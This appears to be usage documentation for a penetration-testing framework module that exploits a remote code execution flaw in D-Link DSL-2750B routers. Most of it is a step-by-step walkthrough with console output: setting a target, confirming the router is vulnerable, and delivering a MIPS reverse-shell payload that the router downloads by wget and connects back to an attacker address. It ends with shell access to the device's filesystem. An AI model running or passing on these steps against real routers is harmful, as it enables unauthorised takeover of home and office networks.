Description

This module exploits remote code execution vulnerability in D-Link DSL-2750B devices through "cli" parameter. Vulnerable firmwares are 1.01 up to 1.03.

Verification Steps

1. Start `./rsf.py`
2. Do: `use exploits/routers/dlink/dsl_2750b_rce`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If router is vulnerable, it should be possible to execute commands on operating system level.

6. Do: `set payload reverse_tcp`
7. Do: `set lhost [AttackerIP]`
8. Do: `run`
9. Payload is sent to device and executed providing attacker with the command shell.

Scenarios

rsf > use exploits/routers/dlink/dsl_2750b_rce
rsf (D-Link DSL-2750B RCE) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (D-Link DSL-2750B RCE) > run
[*] Running module...
[+] Target appears to be vulnerable

[+] Welcome to cmd. Commands are sent to the target via the execute method.
[*] For further exploitation use 'show payloads' and 'set payload <payload>' commands.

cmd > show payloads
[*] Available payloads:

   Payload         Name                   Description
   -------         ----                   -----------
   bind_tcp        MIPSBE Bind TCP        Creates interactive tcp bind shell for MIPSBE architecture.
   reverse_tcp     MIPSBE Reverse TCP     Creates interactive tcp reverse shell for MIPSBE architecture.

cmd > set payload reverse_tcp
cmd (MIPSBE Reverse TCP) > show options

Payload Options:

   Name      Current settings     Description
   ----      ----------------     -----------
   lhost                          Connect-back IP address
   lport     5555                 Connect-back TCP Port


cmd (MIPSBE Reverse TCP) > set lhost 192.168.1.4
lhost => 192.168.1.4
cmd (MIPSBE Reverse TCP) > run
[*] Using wget method
[*] Using wget to download binary
[*] Executing payload on the device
[*] Waiting for reverse shell...
[*] Connection from 192.168.1.1:41933
[+] Enjoy your shell
ls -la
drwxrwxrwx   15 admin    root           224 Mar 11  2013 .
drwxrwxrwx   15 admin    root           224 Mar 11  2013 ..
drwxr-xr-x    2 admin    root          2554 Mar 11  2013 bin
drwxr-xr-x    2 admin    root             3 Mar 11  2013 data
drwxr-xr-x    4 admin    root          2482 Mar 11  2013 dev
drwxr-xr-x   12 admin    root           779 Mar 11  2013 etc
drwxr-xr-x    6 admin    root           690 Mar 11  2013 lib
lrwxrwxrwx    1 admin    root            11 Mar 11  2013 linuxrc -> bin/busybox
drwxr-xr-x    2 admin    root             0 Jan  1  1970 mnt
drwxr-xr-x    5 admin    root            56 Mar 11  2013 opt
dr-xr-xr-x   69 admin    root             0 Jan  1  1970 proc
drwxr-xr-x    2 admin    root           270 Mar 11  2013 sbin
drwxr-xr-x   11 admin    root             0 Jan  1  1970 sys
lrwxrwxrwx    1 admin    root             8 Mar 11  2013 tmp -> /var/tmp
drwxr-xr-x    4 admin    root            38 Mar 11  2013 usr
drwxr-xr-x   16 admin    root             0 Oct 19 20:36 var
drwxr-xr-x    5 admin    root          2801 Mar 11  2013 webs